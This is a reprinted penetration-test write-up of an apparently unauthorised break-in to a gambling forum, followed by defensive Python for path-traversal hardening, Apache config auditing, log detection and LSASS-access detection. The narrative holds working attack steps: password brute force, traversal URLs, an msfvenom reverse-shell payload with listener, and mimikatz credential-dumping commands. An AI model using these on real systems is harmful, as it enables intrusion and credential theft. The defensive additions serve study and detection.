
Title: Notes from a penetration test of a "spinach" (gambling) forum


Information collection. I was just about to start work when someone on Penguin (QQ) messaged me privately, asking me to make a lot of money with him.

Mass messages are one thing, but now they have started messaging people one by one; the criminals are so rampant these days that they deserve what's coming. Let's set the JD card aside first. Opening the front page, it is a gambling forum.

I tried logging in at random and the admin backend turned up. The site is PHP. I tried the common passwords several times: the admin account exists, but the password was wrong.

Put it into Yunxi and take a look.

Accessing it via the domain name is very laggy.

Let's look at the ports again: 3306 is open, and the host is Windows.

After collection was finished, no framework had been identified by the scan and there was almost no progress. The only possible breakthrough points were the admin backend and the open port.

Logging in to the backend and to 3306: I gave it a try just in case, and unsurprisingly nothing came of it; MySQL did not let me in.

A Top100 brute force of the backend was tried and failed. I did not have much hope. I looked through the JS, where there might be passwords, sensitive paths, special interfaces and so on, but it was really clean; maybe I did not look carefully enough.

There was no other breakthrough point, so I could only keep trying the backend. I took a big dictionary and ran it for a long time, and it finally cracked: the iron-headed kid lives on. The dictionary used was abbreviations, years and special characters.

Upload. In the backend's forum article management I saw the editor, and my eyes lit up instantly.

It allows single and multiple image uploads; let's try uploading.

Ouch: a whitelist restriction.

Various truncation and bypass attempts all failed.

To see which editor it is, I searched the JS files and found that it is the wangEditor editor.

I searched online and found that this editor seems to have no known vulnerabilities, and my ideas were exhausted~

The turning point appeared as I kept searching: in the order details, you can also download the order image.

Download link:

http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20191115/1605370100637841.jpg

The download link reveals the website path. I guessed that wwwroot is the web root of the site. Is arbitrary file download possible?

Try constructing a link:

http://www.xxx.com/download.php?filepath=./././wwwroot/news.php

Nice, Hu Hansan is back: things are finally turning around.

Keep looking for configuration files; generally index.php includes the database configuration file.

http://www.xxx.com/download.php?filepath=./././wwwroot/index.php

Continue constructing the link and view config.php.

http://www.xxx.com/download.php?filepath=././wwwroot/config.php

Got the account and tried to connect. It prompted that there was no permission, so that ended in failure. My guess is that there is a firewall, or that the database host value is set to allow local access only.

There was no way forward, so I kept digging and tried to read the Apache configuration file.

http://www.xxx.com/download.php?filepath=./././apache/conf/httpd.conf

Jackpot! HTML files can be executed as PHP files. I went back to try the file upload, changing the suffix before uploading; both upload points failed to upload~

I kept searching and found an avatar upload in member management.

Modified the file name on upload; the response returned the upload path.

Constructed the download link; the file downloaded successfully, which proves that it exists.

http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20201115/1805872100098841.html

Spliced together the access URL, and it was parsed successfully.

http://www.xxx.com/php/upload/2020xxxx/1805872100098841.html

Excited, hands trembling: getshell succeeded.

Afterwards I tried privilege escalation and checked the patch status. There were many updates, but there are always fish that slip through the net.

Using a tool, I searched directly for missing patches, ran the exp, and the escalation succeeded: administrator privileges obtained.

Next, a reverse shell. After all, a plain terminal is uncomfortable to use, so here I used MSF to get a reverse shell.

1. First, use msf to generate a Trojan file locally and specify the payload:

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=xx.xx.xx.xx lport=4444 -f exe -o achess.exe

2. Start a Python HTTP server locally on port 8000:

python -m http.server 8000

3. Place the file in the Python server's directory and check that it is being served.

Download the exe file from the terminal on the target machine:

echo open server ip:8000exe file.

4. Use reverse_tcp in msf to start listening:

handler -p windows/meterpreter_reverse_tcp -H ip -P 4444

5. Execute the exe file, and the shell is received successfully.

Don't take it lightly once you get the session. MSF comes with a mimikatz module. The mimikatz module in MSF supports both 32-bit and 64-bit systems, but it loads as 32-bit by default. So if the target host is 64-bit, loading the module directly will leave many functions unusable. Therefore, on a 64-bit system you must first view the system process list and migrate the meterpreter process into a 64-bit process before loading mimikatz to view system plaintext passwords; this also prevents the session from being interrupted.

Use ps to check the processes and find a stable process to migrate into.

migrate <pid>

Migrate the meterpreter process into process 408: migrate 408

Migration succeeded; everything was there, but the password was still missing. Next, use the mimikatz module in MSF to grab the password.

First load the mimikatz module:

The usage of the mimikatz_command module is listed here:

meterpreter > mimikatz_command -f a:  (enter a non-existent module to list all modules)

meterpreter > mimikatz_command -f samdump:  (lists the samdump subcommands)

meterpreter > mimikatz_command -f samdump:hashes

meterpreter > mimikatz_command -f handle:list  (list application processes)

meterpreter > mimikatz_command -f service:list  (list services)

meterpreter > mimikatz_command -f sekurlsa:searchPasswords

meterpreter > run post/windows/gather/smart_hashdump  (get hashes)

Select the samdump module, which has two functions:

- mimikatz_command -f samdump:hashes

- mimikatz_command -f samdump:bootkey

But this only grabs the password hashes. I wanted to see the plaintext password directly, so I used the searchPasswords function under the sekurlsa module; executing the following command grabbed the password successfully.

mimikatz_command -f sekurlsa:searchPasswords

Finally, the 3389 (remote desktop) connection succeeded and the job was done.

This proves that sometimes it pays to be an iron-headed kid.

Summary

Information was collected from Yunxi, fofa, various plug-ins, subdomains and ports. The backend was brute-forced to get into the site (a good dictionary is very important). Uploading through the editor failed because of whitelist restrictions; identifying the editor and searching for vulnerabilities in it was fruitless. A function point on the download page was found: the download link exposed the website path, and arbitrary file download exposed the database configuration file, but the database connection had no permission. Reading the Apache configuration file showed that the file suffix check could be bypassed, and another upload point led to a successful getshell. After privilege escalation, the mimikatz module in MSF was used to grab the login password, the remote desktop connection succeeded, and the penetration was over.

Reprinted from the original link: https://cloud.tencent.com/developer/article/1790943
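The core flaw in the post above is a download endpoint that glues a user-supplied filepath onto a server path with no containment check, so dot-segments walk out of the upload folder into config.php and httpd.conf. The following is an added example, not code from the original post or the site; it models that flawed logic beside a hardened resolver. The directory layout (/srv/wwwroot, an upload root under php/upload) and the function names are assumptions for illustration.

```python
"""Vulnerable vs. hardened path resolution for a download endpoint.

Added example, not the site's own download.php. The layout below is assumed:
  /srv/wwwroot            -> web root ("wwwroot" in the post's links)
  /srv/wwwroot/php/upload -> the only directory downloads should come from
"""
import posixpath
from typing import Optional

WEB_ROOT = "/srv/wwwroot"                              # assumed
UPLOAD_ROOT = posixpath.join(WEB_ROOT, "php", "upload")  # assumed
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}          # order images only


def vulnerable_resolve(filepath: str) -> str:
    """Model of the flawed logic (assumed): the raw parameter is appended to a
    fixed base and normalised, but never checked for containment. Any path
    reachable from the base, including siblings of the web root, is served."""
    return posixpath.normpath(posixpath.join("/srv", filepath))


def safe_resolve(filepath: str) -> Optional[str]:
    """Return an absolute path inside UPLOAD_ROOT, or None if the request must
    be refused. The parameter is treated as a path *relative to the upload
    root*, so the client never names wwwroot or any other directory."""
    # Refuse empty input, NUL bytes (string truncation in C-backed APIs),
    # backslashes (Windows hosts treat them as separators) and absolute paths.
    if not filepath or "\x00" in filepath or "\\" in filepath or filepath.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, filepath))
    # Containment check: after normalisation the candidate must still share
    # UPLOAD_ROOT as its common prefix directory, which defeats ../ and ./ tricks.
    if posixpath.commonpath([UPLOAD_ROOT, candidate]) != UPLOAD_ROOT:
        return None
    # Serve only the file types this endpoint exists for.
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    # On a real server also os.path.realpath() the existing file and repeat the
    # containment check, so a symlink inside the upload dir cannot point out.
    return candidate


if __name__ == "__main__":
    # Inputs modelled on the post's links (constructed, not real traffic)
    for p in ("./././wwwroot/config.php", "./././apache/conf/httpd.conf"):
        print("vulnerable:", p, "->", vulnerable_resolve(p))
    for p in ("20191115/1605370100637841.jpg", "../../config.php",
              "20201115/1805872100098841.html", "/etc/passwd"):
        print("hardened:  ", p, "->", safe_resolve(p))
```

The hardened version changes the contract as well as the check: the client supplies only a path relative to the upload root, and the server adds the base itself, so the web root never appears in a URL.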
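The second enabling weakness in the post is an httpd.conf that hands .html files to the PHP handler, which turns an "images only" upload whitelist into code execution. As an added example (not from the original post), here is a small audit script that scans an Apache configuration fragment for handler directives routing anything other than .php to PHP. The configuration text is constructed for the demonstration; the real httpd.conf from the post is not reproduced.

```python
"""Audit an Apache config fragment for extensions mapped to the PHP handler.

Added example, not from the original post. SAMPLE_CONF is a constructed
fragment that reproduces the class of misconfiguration described there.
Covers AddHandler/AddType lines and <FilesMatch> blocks; for the latter the
regex is evaluated against probe file names instead of being parsed by hand.
"""
import re
from typing import List

PHP_HANDLER_RE = re.compile(r"php", re.IGNORECASE)
# Names that should never reach the PHP interpreter, plus one that should.
PROBE_NAMES = ["index.html", "page.htm", "note.txt", "pic.jpg", "x.phtml", "app.php"]

SAMPLE_CONF = r"""
# constructed fragment for the audit, not the real httpd.conf from the post
LoadModule php7_module modules/php7apache2_4.dll
AddHandler application/x-httpd-php .php .html
<FilesMatch "\.(php|htm)$">
    SetHandler application/x-httpd-php
</FilesMatch>
AddType image/jpeg .jpg
""".strip("\n")


def audit_php_handlers(conf_text: str) -> List[str]:
    """Return one finding per directive that routes a non-.php name to PHP."""
    findings: List[str] = []
    current_match = None  # pattern of the enclosing <FilesMatch>, if any
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r'<FilesMatch\s+"?([^">]+?)"?\s*>', line, re.IGNORECASE)
        if m:
            current_match = m.group(1)
            continue
        if re.match(r"</FilesMatch>", line, re.IGNORECASE):
            current_match = None
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive in ("addhandler", "addtype") and len(parts) >= 3 \
                and PHP_HANDLER_RE.search(parts[1]):
            # AddHandler/AddType <handler-or-type> <ext> [<ext> ...]
            for ext in parts[2:]:
                if ext.lower() != ".php":
                    findings.append(f"line {lineno}: {parts[0]} maps {ext} "
                                    f"to PHP handler {parts[1]}")
        elif directive == "sethandler" and len(parts) >= 2 and current_match \
                and PHP_HANDLER_RE.search(parts[1]):
            try:
                rx = re.compile(current_match)
            except re.error:
                findings.append(f"line {lineno}: could not evaluate FilesMatch "
                                f"pattern {current_match!r}; review manually")
                continue
            hits = [n for n in PROBE_NAMES if rx.search(n) and not n.endswith(".php")]
            if hits:
                findings.append(f"line {lineno}: FilesMatch {current_match!r} "
                                f"routes {', '.join(hits)} to PHP")
    return findings


if __name__ == "__main__":
    for finding in audit_php_handlers(SAMPLE_CONF):
        print(finding)
```

Probing the FilesMatch regex with sample names, rather than parsing the alternation, also catches patterns written as `\.(ph(p|tml)|html)$` or with character classes. The fix on the server side is the same in every case: map only .php to the handler, and additionally disable script execution in upload directories.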

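From the defender's side, the sequence in the post leaves a recognisable trail in the web server access log: download.php requests whose filepath resolves outside the upload directory, followed by a direct GET of an .html file inside the upload directory. The following added example (not part of the original post) runs that detection over constructed combined-format log lines; the IP addresses are documentation ranges and the upload prefix is assumed from the post's URLs.

```python
"""Access-log detection for the traversal and upload-then-execute pattern.

Added example, not from the original post. SAMPLE_LOG is constructed; the
addresses are RFC 5737 documentation ranges. Assumptions: the download
parameter is named filepath (as in the post) and legitimate values resolve
under wwwroot/php/upload/.
"""
import posixpath
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_PREFIX = "wwwroot/php/upload/"        # assumed from the post's links
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}
SCRIPT_EXT = {".html", ".htm", ".php", ".phtml"}

SAMPLE_LOG = """\
203.0.113.5 - - [15/Nov/2020:10:01:02 +0800] "GET /download.php?filepath=././wwwroot/php/upload/20191115/1605370100637841.jpg HTTP/1.1" 200 48213
203.0.113.5 - - [15/Nov/2020:10:02:10 +0800] "GET /download.php?filepath=./././wwwroot/config.php HTTP/1.1" 200 1320
203.0.113.5 - - [15/Nov/2020:10:03:33 +0800] "GET /download.php?filepath=.%2F.%2F.%2Fapache/conf/httpd.conf HTTP/1.1" 200 20981
203.0.113.5 - - [15/Nov/2020:10:09:41 +0800] "GET /php/upload/20201115/1805872100098841.html HTTP/1.1" 200 77
198.51.100.9 - - [15/Nov/2020:10:10:00 +0800] "GET /index.php HTTP/1.1" 200 5120
198.51.100.9 - - [15/Nov/2020:10:10:05 +0800] "GET /php/upload/20191115/avatar.png HTTP/1.1" 200 8192"""


def classify_target(target: str) -> Optional[str]:
    """Return a reason string if the request target looks abusive, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if path.endswith("/download.php"):
        # parse_qs percent-decodes, so %2F obfuscation is normalised here
        for fp in parse_qs(parts.query).get("filepath", []):
            norm = posixpath.normpath(fp)
            if norm.startswith("/") or not norm.startswith(UPLOAD_PREFIX):
                return f"download.php outside upload dir: {norm}"
            if posixpath.splitext(norm)[1].lower() not in IMAGE_EXT:
                return f"download.php non-image file: {norm}"
        return None
    if path.startswith("/php/upload/") and posixpath.splitext(path)[1].lower() in SCRIPT_EXT:
        return f"script-like file served from upload dir: {path}"
    return None


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Parse combined-format lines and collect alerts with client and time."""
    alerts: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production job would count these
        reason = classify_target(m.group("target"))
        if reason:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "status": m.group("status"), "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG.splitlines()):
        print(f'{a["ts"]} {a["ip"]} {a["status"]} {a["reason"]}')
```

The first sample line is the site's own legitimate link format and is not flagged; the detection keys on where the normalised path ends up, not on the presence of dot-segments, which keeps it quiet on normal traffic. A 200 status on the flagged lines is what turns a probe into a confirmed disclosure.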
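The post's final stage, migrating meterpreter into a 64-bit process and loading mimikatz reflectively to read plaintext credentials, is visible to endpoint telemetry as a process opening LSASS with read access from a call stack that passes through unbacked memory. As an added example (not from the original post), the following filters constructed Sysmon Event ID 10 (ProcessAccess) records in dict form; the allow-list of legitimate LSASS readers is an assumption that must be tuned per environment.

```python
"""Flag suspicious LSASS access in Sysmon ProcessAccess (Event ID 10) records.

Added example, not from the original post. SAMPLE_EVENTS are constructed to
resemble Sysmon fields (SourceImage, TargetImage, GrantedAccess, CallTrace);
they are not captured telemetry. ALLOWED_LSASS_READERS is an assumed baseline.
"""
from typing import Dict, List, Optional, Tuple

PROCESS_VM_READ = 0x0010          # the right needed to read credential material
ALLOWED_LSASS_READERS = {         # assumed allow-list; keep it short and exact
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # routine query from a system service: no VM_READ bit, not flagged
        "SourceImage": r"C:\Windows\System32\svchost.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe",
        "GrantedAccess": "0x1000",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.dll+2bd3e",
    },
    {   # injected code in an unrelated process reading LSASS: flagged twice
        "SourceImage": r"C:\Windows\explorer.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe",
        "GrantedAccess": "0x1010",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|UNKNOWN(000001F4A5B40000)",
    },
    {   # allow-listed security product reading LSASS with a normal stack
        "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe",
        "GrantedAccess": "0x1010",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.dll+2bd3e",
    },
]


def lsass_access_reasons(event: Dict[str, str]) -> Optional[List[str]]:
    """Return the reasons an event is suspicious, or None if it is benign."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    access = int(event.get("GrantedAccess", "0x0"), 16)
    calltrace = event.get("CallTrace", "")
    reasons: List[str] = []
    if access & PROCESS_VM_READ and source not in ALLOWED_LSASS_READERS:
        reasons.append(f"VM_READ on lsass from {source} (GrantedAccess {access:#06x})")
    # Sysmon renders frames in memory with no backing module as UNKNOWN(...);
    # that is what reflectively loaded or injected code looks like.
    if "UNKNOWN(" in calltrace.upper():
        reasons.append("call stack passes through unbacked memory (injected/reflective code)")
    return reasons or None


def scan_process_access(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (SourceImage, reasons) for every suspicious event."""
    hits = []
    for ev in events:
        reasons = lsass_access_reasons(ev)
        if reasons:
            hits.append((ev.get("SourceImage", ""), reasons))
    return hits


if __name__ == "__main__":
    for source, reasons in scan_process_access(SAMPLE_EVENTS):
        print(source)
        for r in reasons:
            print("  -", r)
```

Because the post migrates into an existing 64-bit process before loading mimikatz, matching only on the source image name is weak: the second condition, an unbacked frame in the call stack, is what survives that step. Pair this with the process-migration itself (Sysmon Event ID 8, CreateRemoteThread, into the chosen PID) to reconstruct the chain.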